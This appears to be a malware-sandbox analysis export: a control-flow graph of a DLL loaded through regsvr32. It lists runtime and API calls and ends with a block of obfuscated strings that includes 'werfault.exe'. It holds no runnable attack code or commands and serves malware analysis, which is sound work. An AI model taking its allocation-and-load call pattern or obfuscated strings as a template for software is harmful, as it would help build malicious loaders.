18799->18800 18802 7fef75368ed _CrtIsValidPointer 18799->18802 18816 7fef7539360 LeaveCriticalSection 18800->18816 18804 7fef753695e IsBadReadPtr 18802->18804 18806 7fef7536976 18802->18806 18814 7fef753692f 18802->18814 18803 7fef7536bb0 18804->18806 18805 7fef7536ad2 18810 7fef7536b2d 18805->18810 18811 7fef7536add 18805->18811 18806->18805 18807 7fef7536a29 18806->18807 18808 7fef7536abe 18807->18808 18809 7fef7536a86 IsBadReadPtr 18807->18809 18813 7fef7536bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18808->18813 18809->18808 18809->18814 18810->18814 18815 7fef7536bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18810->18815 18812 7fef7536bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18811->18812 18812->18814 18813->18814 18815->18814 18816->18803 17887 7fef75476c0 17888 7fef7547be3 _CrtMemDumpAllObjectsSince 17887->17888 17889 7fef75476cf _CrtMemDumpAllObjectsSince 17887->17889 17890 7fef7547cc6 WideCharToMultiByte 17888->17890 17900 7fef75476e6 _LocaleUpdate::~_LocaleUpdate 17888->17900 17891 7fef7547905 _CrtMemDumpAllObjectsSince 17889->17891 17892 7fef75477f5 _CrtMemDumpAllObjectsSince wcsncnt 17889->17892 17889->17900 17890->17900 17894 7fef754790f WideCharToMultiByte 17891->17894 17897 7fef7547827 WideCharToMultiByte 17892->17897 17893 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17895 7fef7547d85 17893->17895 17896 7fef7547965 17894->17896 17898 7fef754799a GetLastError 17896->17898 17896->17900 17897->17900 17898->17900 17901 7fef75479d3 _CrtMemDumpAllObjectsSince 17898->17901 17899 7fef7547a05 WideCharToMultiByte 17899->17900 17899->17901 17900->17893 17901->17899 17901->17900 16228 7fef7536ff2 16229 7fef7536ffe 16228->16229 16232 7fef753ca00 16229->16232 16231 7fef7537011 _initterm_e 16233 7fef753ca0e 16232->16233 16234 7fef753ca23 EncodePointer 16233->16234 16235 7fef753ca4b 16233->16235 16234->16233 16235->16231 17376 7fef753f7f1 17377 7fef753f80d 17376->17377 17397 7fef753f8de _wcsftime_l 17376->17397 17433 7fef7546fb0 17377->17433 17379 7fef753fa70 17440 7fef75469c0 17379->17440 17382 7fef7537ff0 _invoke_watson_if_error 16 API calls 17385 7fef753f85a OutputDebugStringA 17382->17385 17383 7fef753fa8a 17387 7fef7537ff0 _invoke_watson_if_error 16 API calls 17383->17387 17384 7fef753f9f4 17384->17379 17388 7fef753d490 std::exception::_Copy_str 17 API calls 17384->17388 17386 7fef753f872 OutputDebugStringA OutputDebugStringA OutputDebugStringA OutputDebugStringA 17385->17386 17392 7fef753f8ce 17386->17392 17390 7fef753fab7 17387->17390 17391 7fef753fa43 17388->17391 17394 7fef753fb24 17390->17394 17395 7fef75469c0 17 API calls 17390->17395 17409 7fef753fb6a 17390->17409 17393 7fef7537ff0 _invoke_watson_if_error 16 API calls 17391->17393 17404 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17392->17404 17393->17379 17396 7fef75469c0 17 API calls 17394->17396 17398 7fef753faf7 17395->17398 17399 7fef753fb3d 17396->17399 17397->17384 17400 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 17397->17400 17401 7fef753f996 17397->17401 17402 7fef7537ff0 _invoke_watson_if_error 16 API calls 17398->17402 17403 7fef7537ff0 _invoke_watson_if_error 16 API calls 17399->17403 17400->17401 17401->17384 17405 7fef753d490 std::exception::_Copy_str 17 API calls 17401->17405 17402->17394 17403->17409 17406 7fef754011d 17404->17406 17407 7fef753f9c7 17405->17407 17408 7fef7537ff0 _invoke_watson_if_error 16 API calls 17407->17408 17408->17384 17410 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 17409->17410 17411 7fef753fc39 17409->17411 17410->17411 17412 7fef753fc97 17411->17412 17413 7fef753d490 std::exception::_Copy_str 17 API calls 17411->17413 17453 7fef7546970 17412->17453 17415 7fef753fc6a 17413->17415 17416 7fef7537ff0 _invoke_watson_if_error 16 API calls 17415->17416 17416->17412 17418 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 17419 7fef753fd6e 17418->17419 17420 7fef7541640 17 API calls 17419->17420 17423 7fef753fdbb 17419->17423 17421 7fef753fd8e 17420->17421 17422 7fef7537ff0 _invoke_watson_if_error 16 API calls 17421->17422 17422->17423 17428 7fef753ff03 std::exception::_Copy_str 17423->17428 17456 7fef7539360 LeaveCriticalSection 17423->17456 17424 7fef753ffef 17426 7fef7540016 17424->17426 17427 7fef7540008 OutputDebugStringA 17424->17427 17426->17392 17430 7fef7546fb0 _itow_s 17 API calls 17426->17430 17427->17426 17428->17392 17428->17424 17429 7fef753ffaa WriteFile 17428->17429 17429->17424 17431 7fef7540065 17430->17431 17432 7fef7537ff0 _invoke_watson_if_error 16 API calls 17431->17432 17432->17392 17434 7fef7547003 17433->17434 17435 7fef7546fd6 17433->17435 17437 7fef7547030 _itow_s 17 API calls 17434->17437 17435->17434 17436 7fef7546fdd 17435->17436 17457 7fef7547030 17436->17457 17439 7fef753f82d 17437->17439 17439->17382 17441 7fef75469e1 17440->17441 17442 7fef7546a42 17441->17442 17444 7fef7546a80 _calloc_dbg_impl 17441->17444 17443 7fef753bd70 _invalid_parameter 17 API calls 17442->17443 17446 7fef7546a76 _calloc_dbg_impl 17443->17446 17445 7fef7546b6e 17444->17445 17447 7fef7546bac _calloc_dbg_impl 17444->17447 17449 7fef753bd70 _invalid_parameter 17 API calls 17445->17449 17446->17383 17448 7fef7546d26 _calloc_dbg_impl 17447->17448 17450 7fef7546ce8 17447->17450 17448->17446 17452 7fef753bd70 _invalid_parameter 17 API calls 17448->17452 17449->17446 17451 7fef753bd70 _invalid_parameter 17 API calls 17450->17451 17451->17446 17452->17446 17473 7fef75463e0 17453->17473 17455 7fef753fd20 17455->17418 17456->17428 17459 7fef7547055 17457->17459 17458 7fef75470ab 17460 7fef753bd70 _invalid_parameter 17 API calls 17458->17460 17459->17458 17461 7fef75470e9 17459->17461 17470 7fef75470df 17460->17470 17462 7fef754714a 17461->17462 17464 7fef7547188 _calloc_dbg_impl 17461->17464 17463 7fef753bd70 _invalid_parameter 17 API calls 17462->17463 17463->17470 17465 7fef7547287 17464->17465 17468 7fef75472c5 17464->17468 17466 7fef753bd70 _invalid_parameter 17 API calls 17465->17466 17466->17470 17467 7fef7547338 17469 7fef753bd70 _invalid_parameter 17 API calls 17467->17469 17468->17467 17471 7fef7547376 17468->17471 17469->17470 17470->17439 17471->17470 17472 7fef753bd70 _invalid_parameter 17 API calls 17471->17472 17472->17470 17474 7fef754640e 17473->17474 17475 7fef754648e 17474->17475 17479 7fef75464cc _calloc_dbg_impl 17474->17479 17476 7fef753bd70 _invalid_parameter 17 API calls 17475->17476 17484 7fef75464c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 17476->17484 17477 7fef754663f 17480 7fef753bd70 _invalid_parameter 17 API calls 17477->17480 17478 7fef754668e _CrtMemDumpAllObjectsSince 17485 7fef7545ea0 17478->17485 17479->17477 17479->17478 17480->17484 17482 7fef75466b5 _calloc_dbg_impl 17483 7fef753bd70 _invalid_parameter 17 API calls 17482->17483 17482->17484 17483->17484 17484->17455 17486 7fef7545ecf 17485->17486 17487 7fef7545fae 17486->17487 17488 7fef7545f6e 17486->17488 17497 7fef7545eda std::exception::_Copy_str _LocaleUpdate::~_LocaleUpdate 17486->17497 17490 7fef7545fcf _CrtMemDumpAllObjectsSince 17487->17490 17491 7fef75462e1 _CrtMemDumpAllObjectsSince 17487->17491 17489 7fef753bd70 _invalid_parameter 17 API calls 17488->17489 17489->17497 17492 7fef75460a1 MultiByteToWideChar 17490->17492 17490->17497 17493 7fef754632f MultiByteToWideChar 17491->17493 17491->17497 17494 7fef754610e GetLastError 17492->17494 17492->17497 17493->17497 17496 7fef7546154 _CrtMemDumpAllObjectsSince wcsxfrm 17494->17496 17494->17497 17495 7fef7546238 MultiByteToWideChar 17495->17497 17496->17495 17496->17497 17497->17482 17498 7fef75353fb 17499 7fef753541d _realloc_dbg 17498->17499 17501 7fef7535421 17499->17501 17504 7fef7536380 17499->17504 17502 7fef75354de _calloc_dbg_impl _realloc_dbg 17508 7fef753c020 17502->17508 17505 7fef7536395 _CrtIsValidPointer 17504->17505 17506 7fef7536391 17504->17506 17505->17506 17507 7fef75363b6 HeapValidate 17505->17507 17506->17502 17507->17506 17509 7fef753c03b HeapFree 17508->17509 17510 7fef753c039 _get_errno_from_oserr 17508->17510 17509->17510 17511 7fef753c05a GetLastError 17509->17511 17510->17501 17511->17510 17940 7fef754e2fc 17941 7fef754e309 get_int64_arg _get_printf_count_output 17940->17941 17942 7fef754e38c 17941->17942 17943 7fef754e3e1 17941->17943 17945 7fef753bd70 _invalid_parameter 17 API calls 17942->17945 17944 7fef754eadf 17943->17944 17946 7fef754eec0 25 API calls 17943->17946 17954 7fef754da75 17943->17954 17947 7fef754ef10 25 API calls 17944->17947 17953 7fef754dbe9 _LocaleUpdate::~_LocaleUpdate 17945->17953 17946->17944 17948 7fef754eafd 17947->17948 17949 7fef754eb33 17948->17949 17951 7fef754eec0 25 API calls 17948->17951 17950 7fef754ec29 17949->17950 17964 7fef754eb49 _CrtMemDumpAllObjectsSince 17949->17964 17952 7fef754ef10 25 API calls 17950->17952 17951->17949 17955 7fef754ebda 17952->17955 17956 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17953->17956 17958 7fef754eca1 17954->17958 17960 7fef754dbb5 17954->17960 17955->17954 17961 7fef754eec0 25 API calls 17955->17961 17957 7fef754ed9e 17956->17957 17958->17953 17959 7fef753bd70 _invalid_parameter 17 API calls 17958->17959 17959->17953 17962 7fef753bd70 _invalid_parameter 17 API calls 17960->17962 17961->17954 17962->17953 17963 7fef754f000 wcsxfrm 2 API calls 17963->17964 17964->17955 17964->17963 17965 7fef754ee40 25 API calls 17964->17965 17965->17964 17977 7fef75412e3 LoadLibraryW 17978 7fef7541304 GetProcAddress 17977->17978 17987 7fef75412fd 17977->17987 17979 7fef754132a 7 API calls 17978->17979 17978->17987 17980 7fef75413b3 GetProcAddress EncodePointer 17979->17980 17981 7fef75413d5 17979->17981 17980->17981 17983 7fef7541428 DecodePointer 17981->17983 17985 7fef75413f9 DecodePointer DecodePointer 17981->17985 17982 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17984 7fef754157a 17982->17984 17983->17987 17985->17983 17987->17982 17988 7fef7537ae3 17991 7fef7537af3 17988->17991 17989 7fef7537ce0 SetHandleCount 17990 7fef7537c74 17989->17990 17991->17989 17992 7fef7537b95 GetStdHandle 17991->17992 17993 7fef7537c7b 17991->17993 17992->17993 17994 7fef7537bb9 17992->17994 17993->17989 17994->17993 17995 7fef7537bc8 GetFileType 17994->17995 17995->17993 17996 7fef7537beb InitializeCriticalSectionAndSpinCount 17995->17996 17996->17990 17996->17993 18834 7fef75444e5 18839 7fef754445a __SehTransFilter 18834->18839 18835 7fef75447d7 18836 7fef754485b 18835->18836 18837 7fef753cf80 _inconsistency 36 API calls 18835->18837 18837->18836 18838 7fef754466c __SehTransFilter 18838->18835 18840 7fef7545bb0 __SehTransFilter 36 API calls 18838->18840 18839->18838 18841 7fef7545180 __SehTransFilter 38 API calls 18839->18841 18842 7fef7544727 18840->18842 18841->18839 18842->18835 18843 7fef753e500 __GetUnwindTryBlock 37 API calls 18842->18843 18844 7fef7544767 18843->18844 18845 7fef753edc0 __SehTransFilter 9 API calls 18844->18845 18845->18835 17515 7fef75513e0 17518 7fef754aee0 17515->17518 17519 7fef754af47 LeaveCriticalSection 17518->17519 17520 7fef754aef7 17518->17520 17522 7fef754af45 17519->17522 17520->17519 17521 7fef754af0b 17520->17521 17524 7fef7539360 LeaveCriticalSection 17521->17524 17524->17522 17525 7fef754bfde 17535 7fef754c00c 17525->17535 17526 7fef754b99c 17527 7fef754cc93 17526->17527 17530 7fef754bada 17526->17530 17529 7fef753bd70 _invalid_parameter 17 API calls 17527->17529 17532 7fef754bb0e _LocaleUpdate::~_LocaleUpdate 17527->17532 17528 7fef754b530 wctomb_s 19 API calls 17528->17535 17529->17532 17534 7fef753bd70 _invalid_parameter 17 API calls 17530->17534 17531 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17533 7fef754cd90 17531->17533 17532->17531 17534->17532 17535->17526 17535->17528 16564 7fef7537de0 16565 7fef7537ded 16564->16565 16569 7fef7537df2 std::exception::_Copy_str _calloc_dbg 16564->16569 16571 7fef753aa40 16565->16571 16567 7fef7537e0e 16569->16567 16575 7fef753d490 16569->16575 16585 7fef7537ff0 16569->16585 16572 7fef753aa57 16571->16572 16573 7fef753aa4d 16571->16573 16572->16569 16589 7fef7539c10 16573->16589 16576 7fef753d4b1 16575->16576 16577 7fef753d512 16576->16577 16579 7fef753d550 _calloc_dbg_impl 16576->16579 16578 7fef753bd70 _invalid_parameter 17 API calls 16577->16578 16581 7fef753d546 _calloc_dbg_impl 16578->16581 16580 7fef753d63e 16579->16580 16583 7fef753d67c _calloc_dbg_impl 16579->16583 16582 7fef753bd70 _invalid_parameter 17 API calls 16580->16582 16581->16569 16582->16581 16583->16581 16584 7fef753bd70 _invalid_parameter 17 API calls 16583->16584 16584->16581 16586 7fef753800e 16585->16586 16587 7fef7538010 16585->16587 16586->16569 16588 7fef753be00 _invalid_parameter 16 API calls 16587->16588 16588->16586 16590 7fef7539c2a 16589->16590 16599 7fef7539b10 16590->16599 16592 7fef7539c34 16603 7fef7539f20 16592->16603 16594 7fef7539c51 16596 7fef7539ecd 16594->16596 16609 7fef753a000 16594->16609 16596->16572 16597 7fef7539ce8 16597->16596 16622 7fef7539360 LeaveCriticalSection 16597->16622 16602 7fef7539b19 16599->16602 16600 7fef7539bde 16600->16592 16602->16600 16623 7fef7539360 LeaveCriticalSection 16602->16623 16604 7fef7539f49 16603->16604 16605 7fef7539f81 16604->16605 16606 7fef7539f5b GetOEMCP 16604->16606 16607 7fef7539f79 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16605->16607 16608 7fef7539f88 GetACP 16605->16608 16606->16607 16607->16594 16608->16607 16610 7fef7539f20 __initmbctable 2 API calls 16609->16610 16611 7fef753a028 16610->16611 16612 7fef753a234 16611->16612 16617 7fef753a039 __initmbctable 16611->16617 16618 7fef753a08e __initmbctable 16611->16618 16615 7fef753a25d IsValidCodePage 16612->16615 16612->16617 16613 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16614 7fef753a470 16613->16614 16614->16597 16616 7fef753a27b GetCPInfo 16615->16616 16615->16617 16616->16617 16620 7fef753a295 __initmbctable 16616->16620 16617->16613 16624 7fef753a5e0 GetCPInfo 16618->16624 16621 7fef753a5e0 __initmbctable 19 API calls 16620->16621 16621->16617 16622->16596 16623->16600 16627 7fef753a61f 16624->16627 16633 7fef753a7dc 16624->16633 16625 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16626 7fef753aa30 16625->16626 16626->16617 16628 7fef753f4d0 _CrtMemDumpAllObjectsSince_stat 3 API calls 16627->16628 16629 7fef753a734 16628->16629 16635 7fef753ef00 16629->16635 16631 7fef753a788 16632 7fef753ef00 __initmbctable 7 API calls 16631->16632 16632->16633 16633->16625 16634 7fef753a80a 16633->16634 16634->16617 16636 7fef753ef2c _CrtMemDumpAllObjectsSince 16635->16636 16639 7fef753efb0 16636->16639 16638 7fef753ef8e _LocaleUpdate::~_LocaleUpdate 16638->16631 16640 7fef753efd4 __initmbctable 16639->16640 16641 7fef753f068 MultiByteToWideChar 16640->16641 16646 7fef753f0ac malloc _MarkAllocaS 16641->16646 16647 7fef753f0a5 _CrtMemDumpAllObjectsSince_stat 16641->16647 16642 7fef753f122 MultiByteToWideChar 16643 7fef753f164 LCMapStringW 16642->16643 16642->16647 16644 7fef753f1a8 16643->16644 16643->16647 16645 7fef753f1b8 16644->16645 16653 7fef753f222 malloc _MarkAllocaS 16644->16653 16645->16647 16648 7fef753f1d9 LCMapStringW 16645->16648 16646->16642 16646->16647 16647->16638 16648->16647 16649 7fef753f2ac LCMapStringW 16649->16647 16650 7fef753f2ea 16649->16650 16651 7fef753f2f4 WideCharToMultiByte 16650->16651 16652 7fef753f341 WideCharToMultiByte 16650->16652 16651->16647 16652->16647 16653->16647 16653->16649 18846 7fef75414e1 18847 7fef75414ef DecodePointer 18846->18847 18848 7fef7541520 DecodePointer 18846->18848 18847->18848 18850 7fef754150f 18847->18850 18849 7fef7541540 18848->18849 18851 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18849->18851 18850->18848 18852 7fef754157a 18851->18852 16659 7fef75335e1 16660 7fef75335f1 16659->16660 16664 7fef75335ea 16659->16664 16660->16664 16665 7fef75312b0 16660->16665 16663 7fef75312b0 14 API calls 16663->16664 16666 7fef75312de CoLoadLibrary 16665->16666 16673 7fef7532f8c 16665->16673 16667 7fef7532f2e VirtualAlloc RtlAllocateHeap 16666->16667 16668 7fef7532f0f MessageBoxA ExitProcess 16666->16668 16671 7fef7532f73 _calloc_dbg_impl 16667->16671 16667->16673 16669 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16670 7fef75330ff 16669->16670 16670->16663 16670->16664 16672 7fef7532f83 CoTaskMemFree 16671->16672 16672->16673 16673->16669 17536 7fef7533fe1 17537 7fef7533fea SetLastError 17536->17537 18447 7fef7545de0 18452 7fef7533170 18447->18452 18451 7fef7545e86 18453 7fef75331ac 18452->18453 18454 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18453->18454 18455 7fef7533263 18454->18455 18455->18451 18456 7fef7533870 18455->18456 18457 7fef75339db __SehTransFilter 18456->18457 18458 7fef75338de __SehTransFilter 18456->18458 18457->18451 18458->18457 18459 7fef7533a71 RtlUnwindEx 18458->18459 18459->18457 18460 7fef754ade0 18465 7fef754fee0 18460->18465 18463 7fef754adf9 18466 7fef754ff00 _fflush_nolock 25 API calls 18465->18466 18467 7fef754ade9 18466->18467 18467->18463 18468 7fef754fc70 18467->18468 18474 7fef754fc86 18468->18474 18469 7fef754fd59 18486 7fef7539360 LeaveCriticalSection 18469->18486 18471 7fef754fd63 18471->18463 18472 7fef754fd09 DeleteCriticalSection 18472->18474 18474->18469 18474->18472 18475 7fef7550580 18474->18475 18476 7fef7550599 18475->18476 18477 7fef755062a 18476->18477 18478 7fef75505ef 18476->18478 18479 7fef7550623 18477->18479 18487 7fef754ae10 18477->18487 18482 7fef753bd70 _invalid_parameter 17 API calls 18478->18482 18479->18474 18481 7fef7550651 18491 7fef7550680 18481->18491 18482->18479 18484 7fef755065c 18485 7fef754aee0 2 API calls 18484->18485 18485->18479 18486->18471 18488 7fef754ae77 EnterCriticalSection 18487->18488 18489 7fef754ae27 18487->18489 18490 7fef754ae3b 18488->18490 18489->18488 18489->18490 18490->18481 18494 7fef7550699 18491->18494 18492 7fef75506ef 18497 7fef753bd70 _invalid_parameter 17 API calls 18492->18497 18493 7fef755072d 18495 7fef7550723 18493->18495 18496 7fef754fdf0 _fflush_nolock 17 API calls 18493->18496 18494->18492 18494->18493 18495->18484 18498 7fef7550752 18496->18498 18497->18495 18499 7fef754afb0 _fflush_nolock 17 API calls 18498->18499 18500 7fef755076a 18499->18500 18502 7fef7550a20 18500->18502 18503 7fef7550a53 18502->18503 18509 7fef7550a33 __doserrno 18502->18509 18504 7fef7550abc __doserrno 18503->18504 18508 7fef7550b05 18503->18508 18506 7fef753bd70 _invalid_parameter 17 API calls 18504->18506 18505 7fef7550bd2 18507 7fef754fae0 _fflush_nolock 3 API calls 18505->18507 18506->18509 18510 7fef7550bdb 18507->18510 18508->18505 18511 7fef7550b89 __doserrno 18508->18511 18509->18495 18514 7fef7550c13 18510->18514 18516 7fef7550c80 18510->18516 18513 7fef753bd70 _invalid_parameter 17 API calls 18511->18513 18513->18509 18529 7fef754fbc0 LeaveCriticalSection 18514->18529 18517 7fef754f900 _fflush_nolock 17 API calls 18516->18517 18519 7fef7550c91 18517->18519 18518 7fef7550d05 18530 7fef754f7d0 18518->18530 18519->18518 18521 7fef7550ce5 18519->18521 18522 7fef754f900 _fflush_nolock 17 API calls 18519->18522 18521->18518 18523 7fef754f900 _fflush_nolock 17 API calls 18521->18523 18524 7fef7550cd6 18522->18524 18525 7fef7550cf8 CloseHandle 18523->18525 18526 7fef754f900 _fflush_nolock 17 API calls 18524->18526 18525->18518 18527 7fef7550d0f GetLastError 18525->18527 18526->18521 18527->18518 18528 7fef7550d22 _dosmaperr 18528->18514 18529->18509 18531 7fef754f7e3 18530->18531 18532 7fef754f878 __doserrno 18530->18532 18531->18532 18533 7fef754f87a SetStdHandle 18531->18533 18534 7fef754f86a 18531->18534 18532->18528 18533->18532 18535 7fef754f871 18534->18535 18536 7fef754f889 SetStdHandle 18534->18536 18535->18532 18537 7fef754f898 SetStdHandle 18535->18537 18536->18532 18537->18532 18853 7fef75448e0 18854 7fef75448f7 std::bad_exception::~bad_exception 18853->18854 18855 7fef754490c 18854->18855 18856 7fef754d710 _Ref_count LeaveCriticalSection 18854->18856 18856->18855 18052 7fef7549aeb 18053 7fef7549b2c 18052->18053 18054 7fef7549b18 18052->18054 18056 7fef754ab10 17 API calls 18053->18056 18055 7fef7549520 19 API calls 18054->18055 18055->18053 18062 7fef7549b38 18056->18062 18057 7fef7549c04 18058 7fef754a1cb 18057->18058 18059 7fef7549c23 GetConsoleCP 18057->18059 18060 7fef754a205 18058->18060 18061 7fef754a8ad WriteFile 18058->18061 18081 7fef7549c4d 18059->18081 18063 7fef754a400 18060->18063 18066 7fef754a21a 18060->18066 18064 7fef754a923 GetLastError 18061->18064 18077 7fef7549dd9 _dosmaperr __doserrno 18061->18077 18062->18057 18065 7fef7549bae GetConsoleMode 18062->18065 18068 7fef754a40e 18063->18068 18082 7fef754a5f3 18063->18082 18064->18077 18065->18057 18069 7fef754a33e WriteFile 18066->18069 18066->18077 18067 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18070 7fef754a9f5 18067->18070 18072 7fef754a531 WriteFile 18068->18072 18068->18077 18069->18066 18071 7fef754a3ea GetLastError 18069->18071 18071->18077 18072->18068 18076 7fef754a5dd GetLastError 18072->18076 18073 7fef754a726 WideCharToMultiByte 18075 7fef754a791 GetLastError 18073->18075 18073->18082 18074 7fef7549f66 WideCharToMultiByte 18074->18077 18078 7fef7549fbf WriteFile 18074->18078 18075->18077 18076->18077 18077->18067 18079 7fef754a050 GetLastError 18078->18079 18078->18081 18079->18077 18079->18081 18080 7fef754a7b0 WriteFile 18080->18082 18083 7fef754a857 GetLastError 18080->18083 18081->18074 18081->18077 18084 7fef754a158 GetLastError 18081->18084 18085 7fef754a06d WriteFile 18081->18085 18086 7fef754f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 18081->18086 18088 7fef754fc00 WriteConsoleW CreateFileW _putwch_nolock 18081->18088 18089 7fef754a1b5 GetLastError 18081->18089 18082->18073 18082->18077 18082->18080 18083->18082 18084->18077 18085->18081 18087 7fef754a103 GetLastError 18085->18087 18086->18081 18087->18077 18088->18081 18089->18077 18547 7fef75391ea 18548 7fef75391ef 18547->18548 18549 7fef75374e0 __crtExitProcess 3 API calls 18548->18549 18550 7fef7539203 18549->18550 18857 7fef753d0ea 18858 7fef753d0ef 18857->18858 18859 7fef7537090 _exit 33 API calls 18858->18859 18860 7fef753d209 18858->18860 18864 7fef753d0fc 18858->18864 18859->18860 18862 7fef753d289 18860->18862 18865 7fef7533d00 RtlEncodePointer 18860->18865 18862->18864 18866 7fef7539360 LeaveCriticalSection 18862->18866 18865->18862 18866->18864 18873 7fef75370e6 18874 7fef7537090 _exit 33 API calls 18873->18874 18875 7fef75370f0 18874->18875 18560 7fef75475e9 18563 7fef75475fb 18560->18563 18565 7fef75475f4 18560->18565 18561 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18562 7fef7547d85 18561->18562 18564 7fef753bd70 _invalid_parameter 17 API calls 18563->18564 18564->18565 18565->18561 17538 7fef753a7e9 17540 7fef753a7f9 17538->17540 17539 7fef753a80a 17540->17539 17541 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17540->17541 17542 7fef753aa30 17541->17542 17543 7fef753c7e9 17544 7fef753c90c EncodePointer EncodePointer 17543->17544 17545 7fef753c80d 17543->17545 17548 7fef753c8ca 17544->17548 17546 7fef753c872 17545->17546 17552 7fef7534a00 17545->17552 17546->17548 17549 7fef7534a00 _realloc_dbg 30 API calls 17546->17549 17550 7fef753c8ce EncodePointer 17546->17550 17551 7fef753c8bd 17549->17551 17550->17544 17551->17548 17551->17550 17553 7fef7534a22 17552->17553 17558 7fef7534a70 17553->17558 17555 7fef7534a4c 17569 7fef7539360 LeaveCriticalSection 17555->17569 17557 7fef7534a5b 17557->17546 17559 7fef7534ad4 _realloc_dbg 17558->17559 17568 7fef7534aae _calloc_dbg_impl 17558->17568 17560 7fef7536380 _CrtIsValidHeapPointer HeapValidate 17559->17560 17559->17568 17565 7fef7534e2c 17560->17565 17561 7fef7534f64 17570 7fef753bc30 17561->17570 17562 7fef7534f90 17585 7fef753ba60 17562->17585 17565->17561 17565->17562 17565->17568 17566 7fef7534fa6 17567 7fef7534fba HeapSize 17566->17567 17566->17568 17567->17568 17568->17555 17569->17557 17571 7fef753bc5f 17570->17571 17572 7fef753bc50 17570->17572 17573 7fef753bc67 17571->17573 17583 7fef753bc78 17571->17583 17596 7fef753abf0 17572->17596 17575 7fef753c020 _free_base 2 API calls 17573->17575 17581 7fef753bc5a _get_errno_from_oserr 17575->17581 17576 7fef753bcba 17578 7fef753abb0 _callnewh DecodePointer 17576->17578 17577 7fef753bc9a HeapReAlloc 17577->17583 17578->17581 17579 7fef753bce4 17580 7fef753bcee GetLastError 17579->17580 17579->17581 17580->17581 17581->17568 17582 7fef753abb0 _callnewh DecodePointer 17582->17583 17583->17576 17583->17577 17583->17579 17583->17582 17584 7fef753bd1f GetLastError 17583->17584 17584->17581 17586 7fef753ba76 17585->17586 17587 7fef753bacc 17586->17587 17588 7fef753bb07 17586->17588 17591 7fef753bd70 _invalid_parameter 17 API calls 17587->17591 17589 7fef753bb00 _get_errno_from_oserr 17588->17589 17590 7fef753bb32 HeapSize HeapReAlloc 17588->17590 17589->17566 17590->17589 17593 7fef753bb74 17590->17593 17591->17589 17592 7fef753bba0 GetLastError 17592->17589 17593->17592 17602 7fef753bbd0 HeapQueryInformation 17593->17602 17597 7fef753ac4d 17596->17597 17599 7fef753ac0a 17596->17599 17598 7fef753abb0 _callnewh DecodePointer 17597->17598 17601 7fef753ac21 17598->17601 17600 7fef753abb0 _callnewh DecodePointer 17599->17600 17599->17601 17600->17599 17601->17581 17603 7fef753bb90 17602->17603 17603->17589 17603->17592

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.937056272.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                  • Associated: 00000005.00000002.937052762.000007FEF7530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.937070765.000007FEF7552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.937081290.000007FEF755B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.937086378.000007FEF755F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: AllocAllocateExitFreeHeapLibraryLoadMessageProcessTaskVirtual
                                                  • String ID: %<$Ya]$g@$$|X$ 4bB$!@C+$"V2$#z$U$$931$$:*:$$D1v$$huN$$}%z$%8#$%</$%U9$&\hR$*hH%$+ong$+iT$-{*$-'C$.#($0kj.$0.3$1\u$2s<S$3ob$5qj'$5vCx$8<-$:!@$:'U@$:9m?$;qdf$<)@P$<M}O$<v:$=kf^$>~$?CE`$@ $BxJr$C/$Cb47$D)'U$Eekg$FLIn$HPZ$Ko*h$L ]1$M13U$M1vi$MDj$N1kj^H<M1vf@$_yiXP+o*hH*fZQl5vC5qjfXErgxjcCb4v_e75<edkge!z$U9k+h$P+oo$PX5$Puvm$QlyO$R;pB$S[L$S}pn$U+on$U9#($V#s$V9s$VO4$^*C$`AnM$aUJ'$c-_j$cDj$e7tc$ePO$gVWH$h78<$hx"$j+h$kxfc$l|f$mCl4$mbPv$pAT#$rkE@$t(O$tc`$w&ed$wC54$werfault.exe$wk/$xA\#${$U|${fM$$|e:$} z$$}'6$}WL$It$"!k$%Uc$(pd$*hH$,$n$,1.$9[+$?x?$EBg$M z$N3$Pl5$i~e$jfX$oE$`I
                                                  • API String ID: 2181984824-2032897877
                                                  • Opcode ID: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                  • Instruction ID: b6113464a3069b9c2ea7483fb119c14b36b3fc08ee8feeeb5aad03cf64425d1c
                                                  • Opcode Fuzzy Hash: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                  • Instruction Fuzzy Hash: CCE2C8F691A7C58FE3B48F62AA817DD3AA0F345748F509208D3991FA1DCB395242CF85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
